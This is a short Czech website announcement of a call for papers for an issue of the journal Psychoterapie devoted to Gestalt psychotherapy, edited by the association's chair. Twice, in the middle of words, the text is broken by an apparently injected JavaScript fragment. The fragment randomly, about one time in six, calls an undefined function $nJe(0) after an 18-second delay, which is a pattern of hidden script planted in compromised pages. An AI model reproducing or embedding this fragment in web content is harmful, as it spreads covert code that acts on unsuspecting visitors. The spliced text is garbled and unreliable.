Jedinečná publikační příleži var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tost zde https://journals.muni.cz/psychoterapie/pages/view/cfp2020. Edi var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torem čísla časopisu Psychoterapie, které bude celé věnováno Gestalt psychoterapii je náš předseda, Michal Černík.